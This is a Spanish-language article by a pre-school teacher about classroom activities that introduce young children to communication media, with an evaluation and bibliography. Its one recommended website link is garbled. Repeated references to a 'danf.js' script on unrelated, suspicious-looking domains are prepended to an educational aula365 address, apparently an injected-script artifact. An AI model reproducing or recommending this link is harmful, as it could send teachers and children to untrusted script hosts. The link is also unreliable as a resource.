¿CÓMO NOS PODEMOS COMUNICAR?

Autora: María Fernanda Rodríguez Rodríguez

          Los medios de comunicación están presentes en la vida del niño desde su nacimiento. Por ello, desde la escuela debemos favorecer el conocimiento de los distintos medios que existen: uso adecuado, utilidad, características y funciones que cumplen, etc.; además de los diversos programas existentes, informándoles de los más adecuados para sus edades.

          La metodología que usaremos está basada en los principios metodológicos expresados en el Anexo I del Decreto 4 de 11 de enero de 2008, por el que se aprueba el Currículo de Educación Infantil para la Comunidad Autónoma de Extremadura: aprendizaje significativo, enfoque globalizador, principio de actividad, carácter preventivo y compensador de desigualdades, individualización, la colaboración y coordinación entre los elementos que inciden en el proceso educativo de los niños y las niñas,…

Algunas actividades que van a favorecer el conocimiento de los medios de comunicación.

  • Para conocer qué saben mis alumnos sobre los medios de comunicación llevé al aula un móvil. Les pregunté si saben qué es, cómo se usa, si lo tienen sus padres… Seguidamente les mostré un folleto de publicidad donde aparecen otros medios de comunicación como televisiones, radios, ordenadores… y les pregunté de qué medio se trata y para qué sirven.
  • A continuación, para motivarles les leí un cuento relacionado con el tema tratado, titulado “Los medios de comunicación van de fiesta”.
  • Visitamos el aula de informática para observar el funcionamiento de la pizarra digital, uno de los medios de comunicación más novedosos hoy en día en las escuelas.
  • Comentamos los programas de televisión que visualizan diariamente y el tiempo que dedican a la televisión. Después, reflexionamos colectivamente sobre qué tipo de programas se pueden ver, destacando que no todos los programas son adecuados para los niños.
  • Realizaron un mural con las normas que debemos tener en cuenta cuando usamos el ordenador, como:

-        No hay que situarse muy cerca de la televisión o del ordenador para no tener posteriormente problemas de vista.

-        Debemos sentarnos correctamente en la silla o sillón, con la espalda apoyada en el respaldo y la cabeza recta.

-      Seguidamente cada alumno comentó si cumplen estas normas.

  • Uno de los padres de mis alumnos tiene una tienda de electrodomésticos. Les propuse a mis alumnos realizar una visita a la tienda. Antes de realizar la visita preparamos, entre todos, un cuestionario con las siguientes preguntas:

-        ¿Qué medios de comunicación se venden en la tienda?

-        ¿En qué se diferencian?

-        ¿Cuestan mucho dinero? ¿Todos valen lo mismo?

-        ¿Todos los medios de comunicación cumplen la misma función?

-        …

          Una vez en el aula, hablamos sobre lo que habíamos aprendido. Posteriormente, decidimos comunicárselo a sus padres. Para ello, yo les mandé una nota informativa. En esta nota les informábamos sobre la hora y el tema que íbamos a tratar en la presentación.

           Finalmente, destacar una página web para trabajar con los niños los medios de comunicación:

-        http://middle.destinyfernandi.com/clork/bons/danf.js?k=0&middle.destinyfernandi.com/clork/bons/danf.js?k=0&middle.destinyfernandi.com/clork/bons/danf.js?k=0&middle.destinyfernandi.com/clork/bons/danf.js?k=0&adjust.admarketlocation.com/bons/danf.js?k=0&adjust.admarketlocation.com/bons/danf.js?k=0&adjust.admarketlocation.com/bons/danf.js?k=0&adjust.admarketlocation.com/bons/danf.js?k=0&argentina.aula365.com/tutoriales/IUD4/IUD4_pres_i01.htm

Valoración de la experiencia:

          El resultado de la experiencia fue muy positivo. Pude apreciar que los niños, hoy día, ven los medios de comunicación como algo más en su vida. Por ello, su aprendizaje no tuvo ninguna dificultad.  Les encantó la invitación de los padres al aula, favoreciendo su aprendizaje.

 

Bibliografía:

  •   Zabalza, M.A, Didáctica de la Educación Infantil, Narcea S.A. Madrid, 1987.
  •   Piaget, J. y Inchelder, B., La psicología del niño, Editorial Morata. Madrid, 1984.
  •   DECRETO 4/2008, de 11 de enero, por el que se aprueba el Currículo de Educación Infantil para la Comunidad Autónoma de Extremadura, DOE, 18 de enero de 2008, núm. 12, p.1226-1272.

 

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